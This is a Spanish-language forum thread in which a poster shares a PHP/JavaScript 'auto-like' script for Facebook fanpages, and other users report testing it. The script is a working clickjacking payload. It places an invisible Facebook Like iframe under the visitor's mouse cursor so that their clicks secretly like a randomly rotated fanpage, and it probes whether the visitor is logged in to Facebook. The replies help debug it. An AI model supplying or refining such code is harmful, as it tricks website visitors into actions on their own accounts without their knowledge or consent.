Script Auto-MeGusta para Fanpages de Facebook

• Autor Autor Gorcash
  • Fecha de inicio Fecha de inicio
G

Gorcash

Delta
Programador
¡Usuario con pocos negocios! ¡Utiliza siempre saldo de Forobeta!
Regalo este script porque está sin pulir, fue una idea que abandoné a medio hacer.

- Cuenta con posibilidad de filtrado por el idioma del navegador (por defecto Español, se pueden modificar, quitar y añadir distintos idiomas para cada tipo de fanpage).
- Detecta si está el usuario o no registrado en Facebook para mostrar o no el script.
- Rotación de fanpages aleatoria.

Insertar CODE, HTML o PHP:
<? $idioma = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2); switch ($idioma){ case "es": ?>

<script type='text/javascript' src='http://code.jquery.com/jquery-1.7.2.min.js'></script>

<script type="text/javascript" src="https://www.facebook.com/people/Jens-Lübberstedt/1009310897" onload="set_test('facebook',1)" onerror="set_test('facebook',0)" async="async"></script>

<script type="text/javascript">function set_test(network, status){ if(status){ var iflag = 0; var icontainer = document.getElementById('megusta'); var standardbody=(document.compatMode=="CSS1Compat")? document.documentElement : document.body; function mouseFollower(e){ if (window.event){ icontainer.style.top = (window.event.y-5)+standardbody.scrollTop+'px'; icontainer.style.left = (window.event.x-5)+standardbody.scrollLeft+'px'; }else{icontainer.style.top = (e.pageY-5)+'px'; icontainer.style.left = (e.pageX-5)+'px'; }} document.onmousemove = function(e){ if (iflag == 0) {mouseFollower(e); }}}else{ alert("No logueado en Facebook "); }}</script>

<?php $TXT = "http://www.url.com/fanpages.txt"; ?>

<?php $megusta = file($TXT); $aleatorio = $megusta[array_rand($megusta)]; ?>

<div style='overflow: hidden; width: 10px; height: 12px; position: absolute; opacity: 0.0;' id='megusta'>

<iframe src='http://www.facebook.com/plugins/like.php?href=<?php echo $aleatorio; ?>' scrolling='no' frameborder='0' style='border:none; overflow:hidden; width:50px; height:23px;' allowTransparency='true'></iframe></div>

<? break; } ?>

Configuración:

Crea un archivo llamado fanpages.txt con una URL de fanpage/web por linea. Súbelo a tu hosting y configura la variable $TXT del script. Esto hará que las URL vayan rotando aleatoriamente.

Última edición:
gracias ma atrde lo pruebo

En unos minutos lo pruebo y confirmo si funciona 🙂

Ahora lo pruebo, gracias. :topsy_turvy:

He actualizado el post y he puesto una versión casera que tenía a medio hacer. Funciona pero es bastante mejorable, ahí os dejo la base.

si no estas logeado salta el cuadrito de facebook?

En Firefox, Chrome y Safari no salta el cuadro en caso de no estar logueado en Facebook.

Lamentablemente no pude hacerlo funcionar, me daba error en la linea 18, no digo que no funcione si no que a lo mejor hice algo mal, pero aver si a alguien mas le funciona, Gracias de todos modos!

Lo probe y si me funciona, pero de igual forma si me desconecto del facebook, me sale la ventana para iniciar sesion

Lamentablemente no pude hacerlo funcionar, me daba error en la linea 18, no digo que no funcione si no que a lo mejor hice algo mal, pero aver si a alguien mas le funciona, Gracias de todos modos!

El script no tiene 18 lineas, el error no puede ser de él.

- - - Actualizado - - -

Lo probe y si me funciona, pero de igual forma si me desconecto del facebook, me sale la ventana para iniciar sesion

¿Qué navegador utilizas? A mi me funcionaron las pruebas que hice en Chrome.

- - - Actualizado - - -

Funciona en Blogger?

La parte de PHP no (detectar idioma y rotar fanpages). Si quieres te separto el resto que está en javascript y que si funcionaría.

Bien, el problema residía en la URL que utilizaba para ver si estaba o no logueado. He actualizado el post principal con la corrección.

No lo logre hacer funcionar, me muestra el alert y aunque le saque el ALERT del codigo, de un modo u otro no funciona

Tengo una duda luego de hacer click en el me gusta le sigue saliendo al usuario el cuadrito o detecta si el usuario ya dio el me gusta y no le vuelve a salir??????

Muchas gracias por tu aporte 😀

Tengo una duda luego de hacer click en el me gusta le sigue saliendo al usuario el cuadrito o detecta si el usuario ya dio el me gusta y no le vuelve a salir??????

Muchas gracias por tu aporte 😀

Esa era la intención, seguir y mejorarlo hasta ese punto. De forma que incluso rotara las fanpages click tras click, en AJAX o jQuery. Si me decido por seguir desarrollando o alguien se anima a continuarlo, lo iremos viendo en éste tema. Yo de momento no tengo demasiado tiempo, el poco que tengo me lo paso aquí posteando...

Atrás